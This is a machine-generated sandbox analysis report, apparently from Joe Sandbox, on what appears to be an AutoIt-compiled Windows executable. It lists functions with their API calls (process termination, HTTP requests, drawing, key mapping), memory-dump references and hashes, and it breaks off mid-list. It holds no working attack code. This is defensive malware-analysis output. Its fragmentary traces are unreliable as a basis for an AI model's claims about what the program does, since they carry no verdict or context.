                                                                                                                        • LineTo.GDI32(00000000,00000003,?), ref: 00DFEA06
                                                                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00DFEA14
                                                                                                                        • LineTo.GDI32(00000000,00000000,?), ref: 00DFEA24
                                                                                                                        • EndPath.GDI32(00000000), ref: 00DFEA34
                                                                                                                        • StrokePath.GDI32(00000000), ref: 00DFEA44
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 43455801-0
                                                                                                                        • Opcode ID: 53bcb36bec503416ced0246ab809083e1de34c04e28758e456f7e2f365b77538
                                                                                                                        • Instruction ID: dee6b0be3dac226ab02e3657d2ef8efd4590e33012662c3b87c62896542a817c
                                                                                                                        • Opcode Fuzzy Hash: 53bcb36bec503416ced0246ab809083e1de34c04e28758e456f7e2f365b77538
                                                                                                                        • Instruction Fuzzy Hash: E511097600414DBFDF169F91DC88EEA7FADEB08354F048412FA0959170D7719E59DBA0
                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(00000000), ref: 00DCEFB6
                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00DCEFC7
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DCEFCE
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00DCEFD6
                                                                                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00DCEFED
                                                                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 00DCEFFF
                                                                                                                          • Part of subcall function 00DCA83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00DCA79D,00000000,00000000,?,00DCAB73), ref: 00DCB2CA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 603618608-0
                                                                                                                        • Opcode ID: 601798831c7f1b23c8e2098056e0989de3b248c1307207a6468ebd8bbdf253f6
                                                                                                                        • Instruction ID: 5988616fc326ac4cf55337601c6c63f772b3e0e379ea5d007f3801061d30f21c
                                                                                                                        • Opcode Fuzzy Hash: 601798831c7f1b23c8e2098056e0989de3b248c1307207a6468ebd8bbdf253f6
                                                                                                                        • Instruction Fuzzy Hash: 4B0184B5A00319BFEB109FA69C45F5EBFB8EF48751F14806AFA04AB280D6709C00CB61
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1423608774-0
                                                                                                                        • Opcode ID: 881f096152371b28a986c443a73c19f37776771b8fb5517a7b0c802ddb38ec39
                                                                                                                        • Instruction ID: b07a2c97e87769f9d7695cdbef74911856a0d3ede6f8a384a6a97cfbce487a51
                                                                                                                        • Opcode Fuzzy Hash: 881f096152371b28a986c443a73c19f37776771b8fb5517a7b0c802ddb38ec39
                                                                                                                        • Instruction Fuzzy Hash: F501D132105211AFD7152F99EC48DEB77AAFF89702B04812AF503A22A1DBB4AC04CB71
                                                                                                                        APIs
                                                                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D91898
                                                                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00D918A0
                                                                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D918AB
                                                                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D918B6
                                                                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00D918BE
                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D918C6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Virtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4278518827-0
                                                                                                                        • Opcode ID: 59a3ccf91df189e5b8f30f74660a002ccf67e23d1057d63e94154cb9c8672c87
                                                                                                                        • Instruction ID: 0cfb91810ce6748fe021255020525f61d9da1a0efe763fbdb870807d431eb855
                                                                                                                        • Opcode Fuzzy Hash: 59a3ccf91df189e5b8f30f74660a002ccf67e23d1057d63e94154cb9c8672c87
                                                                                                                        • Instruction Fuzzy Hash: 260167B0902B5ABDE3008F6A8C85B52FFB8FF19354F04411BA15C47A42C7F5A868CBE5
                                                                                                                        APIs
                                                                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00DD8504
                                                                                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00DD851A
                                                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00DD8529
                                                                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DD8538
                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DD8542
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DD8549
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 839392675-0
                                                                                                                        • Opcode ID: a2ce955abb821bee7aacb527fb766fb3bbb09cc8441b1dfc6401e5754bbec151
                                                                                                                        • Instruction ID: c72121b26d473e155fe82173227a1c80158296b7cf4cd438c04feaed981426e4
                                                                                                                        • Opcode Fuzzy Hash: a2ce955abb821bee7aacb527fb766fb3bbb09cc8441b1dfc6401e5754bbec151
                                                                                                                        • Instruction Fuzzy Hash: 0DF09A72241158BFE7211B639C0EEEF3B7CEFC6B11F004018FA05A1050EBA02A09C6B4
                                                                                                                        APIs
                                                                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 00DDA330
                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 00DDA341
                                                                                                                        • TerminateThread.KERNEL32(?,000001F6,?,?,?,00E066D3,?,?,?,?,?,00D9E681), ref: 00DDA34E
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00E066D3,?,?,?,?,?,00D9E681), ref: 00DDA35B
                                                                                                                          • Part of subcall function 00DD9CCE: CloseHandle.KERNEL32(?,?,00DDA368,?,?,?,00E066D3,?,?,?,?,?,00D9E681), ref: 00DD9CD8
                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00DDA36E
                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 00DDA375
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3495660284-0
                                                                                                                        • Opcode ID: 57dc81465e1d39c4e0ed5e8ea71d9bea62d6f5993e87c7a6deabece4c9fa58a6
                                                                                                                        • Instruction ID: d69eb634ff2da0ca4489a0228a2adfd5aed808615a13186f852bb10227aaa2ef
                                                                                                                        • Opcode Fuzzy Hash: 57dc81465e1d39c4e0ed5e8ea71d9bea62d6f5993e87c7a6deabece4c9fa58a6
                                                                                                                        • Instruction Fuzzy Hash: 5AF05E72149211AFD3112FA9ED48DDB7B7AEF89702B048522F202A21B1DBB59845CB61
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DB010A: std::exception::exception.LIBCMT ref: 00DB013E
                                                                                                                          • Part of subcall function 00DB010A: __CxxThrowException@8.LIBCMT ref: 00DB0153
                                                                                                                          • Part of subcall function 00D9CAEE: _memmove.LIBCMT ref: 00D9CB2F
                                                                                                                          • Part of subcall function 00D9BBD9: _memmove.LIBCMT ref: 00D9BC33
                                                                                                                        • __swprintf.LIBCMT ref: 00DAD98F
                                                                                                                        Strings
                                                                                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00DAD832
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                        • API String ID: 1943609520-557222456
                                                                                                                        • Opcode ID: 7b11205b78f5fe9dcda1ff90be751a119f6ed9d5d803da6a34877942e6308268
                                                                                                                        • Instruction ID: 866571a077545187afe575c34e21f738cdfa9f8d0aeb9c3f6c9f6e10251db202
                                                                                                                        • Opcode Fuzzy Hash: 7b11205b78f5fe9dcda1ff90be751a119f6ed9d5d803da6a34877942e6308268
                                                                                                                        • Instruction Fuzzy Hash: 75915A311183019FCB14EF64C886DAEBBA5EF86714F04491DF496AB2A5EB30ED45CB72
                                                                                                                        APIs
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00DEB4A8
                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00DEB5B7
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00DEB73A
                                                                                                                          • Part of subcall function 00DDA6F6: VariantInit.OLEAUT32(00000000), ref: 00DDA736
                                                                                                                          • Part of subcall function 00DDA6F6: VariantCopy.OLEAUT32(?,?), ref: 00DDA73F
                                                                                                                          • Part of subcall function 00DDA6F6: VariantClear.OLEAUT32(?), ref: 00DDA74B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                        • API String ID: 4237274167-1221869570
                                                                                                                        • Opcode ID: cad2f6490470f3e60e4084e2659567f67be0788d4b4802b4e7b70dda90aa15ad
                                                                                                                        • Instruction ID: 4f8c60209268b68738c1e6b2c636208fb32fe5dee9151682f0037af6c90ec222
                                                                                                                        • Opcode Fuzzy Hash: cad2f6490470f3e60e4084e2659567f67be0788d4b4802b4e7b70dda90aa15ad
                                                                                                                        • Instruction Fuzzy Hash: 8C916A746083419FCB10EF29C48095BBBE5EF89714F14896EF88A9B351DB31E945CB72
                                                                                                                        APIs
                                                                                                                        • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00DD10B8
                                                                                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00DD10EE
                                                                                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00DD10FF
                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00DD1181
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                        • String ID: DllGetClassObject
                                                                                                                        • API String ID: 753597075-1075368562
                                                                                                                        • Opcode ID: 26cfea74514221fd1bf0126ac464c926ee1707bc258a485eab9e1735763e326d
                                                                                                                        • Instruction ID: 460768536cb350f3ee615016a07eba4cc2f48de0640920df61b9c2f075c60654
                                                                                                                        • Opcode Fuzzy Hash: 26cfea74514221fd1bf0126ac464c926ee1707bc258a485eab9e1735763e326d
                                                                                                                        • Instruction Fuzzy Hash: AA4148B5600305FFDB05CF95CC85BAA7BA9EF44350B1481AAEA09AF305D7B1D944CBB0
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00DD5A93
                                                                                                                        • GetMenuItemInfoW.USER32 ref: 00DD5AAF
                                                                                                                        • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00DD5AF5
                                                                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00E518F0,00000000), ref: 00DD5B3E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$Delete$InfoItem_memset
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 1173514356-4108050209
                                                                                                                        • Opcode ID: c35c39adca41881d4c16d7b05428f472780d920ce6735b56ccacb96df24387ee
                                                                                                                        • Instruction ID: 2de530b0923ccc99919e1ef8cf9a8f670ee114aad7fa6dcbb5c0a7453a85add0
                                                                                                                        • Opcode Fuzzy Hash: c35c39adca41881d4c16d7b05428f472780d920ce6735b56ccacb96df24387ee
                                                                                                                        • Instruction Fuzzy Hash: D6417C712047019FDB109F24E884B5ABBE5EF88314F09465FF9A59B3D5D770A8048B76
                                                                                                                        APIs
                                                                                                                        • CharLowerBuffW.USER32(?,?,?,?), ref: 00DF0478
                                                                                                                          • Part of subcall function 00D97F40: _memmove.LIBCMT ref: 00D97F8F
                                                                                                                          • Part of subcall function 00D9A2FB: _memmove.LIBCMT ref: 00D9A33D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove$BuffCharLower
                                                                                                                        • String ID: cdecl$none$stdcall$winapi
                                                                                                                        • API String ID: 2411302734-567219261
                                                                                                                        • Opcode ID: 2d5b07dec7397bf8989b32f821a8fe1b9dec496ac5f0af5cb26a6f27e08b8443
                                                                                                                        • Instruction ID: b3fded992a02b3108cc67f92499f127a2ac726b7fe4752155e76ab6d86e217aa
                                                                                                                        • Opcode Fuzzy Hash: 2d5b07dec7397bf8989b32f821a8fe1b9dec496ac5f0af5cb26a6f27e08b8443
                                                                                                                        • Instruction Fuzzy Hash: AD31A570500619ABCF00DF58D8419FEB7B5FF05350B148A29E562A72D6DB71E905CBB0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00D9CAEE: _memmove.LIBCMT ref: 00D9CB2F
                                                                                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00DCC684
                                                                                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00DCC697
                                                                                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00DCC6C7
                                                                                                                          • Part of subcall function 00D97E53: _memmove.LIBCMT ref: 00D97EB9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$_memmove
                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                        • API String ID: 458670788-1403004172
                                                                                                                        • Opcode ID: 4ed029885bee29ae8b2ea7a28a8b1cbf97d498c6b0f484527766b7e2320b76d6
                                                                                                                        • Instruction ID: db34966370d3014311cc7bbf4e96208e1b8e2ee9682cc65eac75cc91fc6164cc
                                                                                                                        • Opcode Fuzzy Hash: 4ed029885bee29ae8b2ea7a28a8b1cbf97d498c6b0f484527766b7e2320b76d6
                                                                                                                        • Instruction Fuzzy Hash: 4421E1B1940105AEDB04EBA4DC86EFFBBA8DF05350B14961DF526E31E0DB745D0A9734
                                                                                                                        APIs
                                                                                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00DE4A60
                                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DE4A86
                                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00DE4AB6
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00DE4AFD
                                                                                                                          • Part of subcall function 00DE56A9: GetLastError.KERNEL32(?,?,00DE4A2B,00000000,00000000,00000001), ref: 00DE56BE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
